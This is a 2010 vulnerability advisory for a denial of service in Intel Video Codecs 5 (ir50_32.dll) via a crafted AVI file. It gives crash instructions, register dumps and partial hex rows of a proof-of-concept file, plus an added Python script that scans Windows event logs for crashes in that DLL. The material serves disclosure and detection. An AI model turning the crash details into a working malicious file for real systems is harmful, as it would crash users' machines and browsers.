# Title : Intel Video Codecs v5 Remote Denial Of Service Vulnerability
# Published : 2010-09-03
# Author : Matthew Bergin
Intel Video Codecs 5 Remote Denial of Service
Author: Matthew Bergin
Website: http://berginpentesting.com/
Email: matt@berginpentesting.com
Date: August 27, 2010
Filename: ir50_32.dll
Version: 5.2562.15.55
Description:
A remote user can cause a denial of service on remote hosts by embedding a specially crafted AVI file in an HTML page. The included PoC also causes a crash locally when the file is viewed in My Computer.
Application Events Notice:
Faulting application explorer.exe, version 6.0.2900.5512, faulting module ir50_32.dll, version 5.2562.15.55, fault address 0x00002897.
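Added example (not part of the original advisory): a Python scan of Application event messages, in the layout quoted above, for crashes in ir50_32.dll, counted per host process. The iexplore.exe and notepad.exe lines and their version numbers are constructed sample data, and the function names are hypothetical.

```python
import re
from collections import Counter

MODULE = "ir50_32.dll"              # faulting module named in the advisory
REPORTED_VERSION = "5.2562.15.55"   # module version named in the advisory

# Layout of the "Application Events Notice" message quoted in the advisory.
EVENT_RE = re.compile(
    r"Faulting application (?P<app>[^,]+), version (?P<app_ver>[^,]+), "
    r"faulting module (?P<module>[^,]+), version (?P<mod_ver>[^,]+), "
    r"fault address (?P<offset>0x[0-9a-fA-F]+)"
)

# First line is the advisory's own event text; the rest are constructed samples.
SAMPLE_EVENTS = [
    "Faulting application explorer.exe, version 6.0.2900.5512, faulting module "
    "ir50_32.dll, version 5.2562.15.55, fault address 0x00002897.",
    "Faulting application iexplore.exe, version 1.2.3.4, faulting module "
    "IR50_32.DLL, version 5.2562.15.55, fault address 0x00002897.",
    "Faulting application notepad.exe, version 1.2.3.4, faulting module "
    "example.dll, version 1.0.0.0, fault address 0x00001000.",
    "The service entered the running state.",
]

def parse_event(message):
    """Return the crash fields of one message, or None if it is not a crash record."""
    m = EVENT_RE.search(message)
    if m is None:
        return None
    fields = {k: v.strip() for k, v in m.groupdict().items()}
    fields["offset"] = int(fields["offset"], 16)
    return fields

def find_codec_crashes(messages):
    """Return parsed crash records whose faulting module is the codec DLL."""
    hits = []
    for message in messages:
        event = parse_event(message)
        if event and event["module"].lower() == MODULE:
            # Note whether the build matches the one the advisory tested.
            event["reported_build"] = event["mod_ver"] == REPORTED_VERSION
            hits.append(event)
    return hits

def crashes_by_process(hits):
    """Count codec crashes per host process, to see which viewers are affected."""
    return Counter(event["app"].lower() for event in hits)

if __name__ == "__main__":
    for app, count in crashes_by_process(find_codec_crashes(SAMPLE_EVENTS)).items():
        print(f"{app}: {count} crash(es) in {MODULE}")
```

The module name is matched case-insensitively because the event text may report it in either case; any build of the DLL is flagged, with `reported_build` marking the version the advisory names.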
Crash Instructions:
MOV EDI, DWORD PTR DS:[EDX+EDI*4-4] <- Crash Here
MOV AH, AL
AND CH, 0C0
CMP CH, 40
JE ir50_32.738727C3
Crash Registers:
eax 00030026
ecx 00000DEA
edx 02b80004
ebx 00000001
esp 0849f420
ebp fb202196
esi 05d5fe4c
edi 7ecc7dc7
eip 73872c52
Reproduction:
PoC File:
Addr : 0 1 2 3 4 5 6 7 8 9 A B C D E F
2090h: F3 2C 00 7E 12 C8 71 2D 88 F8 BC CF DD 6F F8 E0
....
20B0h: B1 97 C5 F3 79 29 F0 41 92 71 0D C0 7E 73 F1 EC
....
2120h: CE 87 8E C3 10 FA 17 49 86 E7 E1 23 33 AC F1 89
....
21E0h: 37 FA 7F 3F 16 F7 D7 CF 39 CF 0F F1 94 C0 C0 34